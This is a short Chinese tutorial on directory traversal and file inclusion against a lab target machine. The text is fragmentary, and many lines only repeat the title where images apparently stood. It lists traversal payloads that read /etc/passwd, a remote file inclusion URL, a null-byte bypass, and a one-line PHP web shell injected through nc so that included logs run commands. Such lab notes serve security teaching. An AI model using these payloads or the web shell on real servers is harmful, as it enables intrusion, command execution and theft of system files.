web目标遍历和文件包含漏洞

web目标遍历和文件包含漏洞


配置靶机:

web目标遍历和文件包含漏洞

web目标遍历和文件包含漏洞     → web目标遍历和文件包含漏洞

重启apache服务:

web目标遍历和文件包含漏洞

经典测试方法:

•?file=../../../../etc/passwd

•?page=file:///etc/passwd

•?home=main.cgi 

•?page=http://www.a.com/1.php

•http://1.1.1.1/../../../../dir/file.txt 


绕过过滤检测方法

部分服务器防御机制:在路径后面添加.php

**方法:

1.在路径后添加%00,如:../../../../etc/password%00

原理:服务器会自动忽略%00后面的内容

2.编码:

web目标遍历和文件包含漏洞

代码利用:

web目标遍历和文件包含漏洞



通过nc目标机器的80端口,注入代码

<?php echoshell_exec($_GET['cmd']);?>

web目标遍历和文件包含漏洞

如果www-data有权限访问web目标遍历和文件包含漏洞,则可以执行攻击代码。


对http://一次性过滤的攻击方法:web目标遍历和文件包含漏洞


漏洞危害:

web目标遍历和文件包含漏洞

web目标遍历和文件包含漏洞

web目标遍历和文件包含漏洞




web目标遍历和文件包含漏洞

有很多攻击字典,可配合burp的intruder模块使用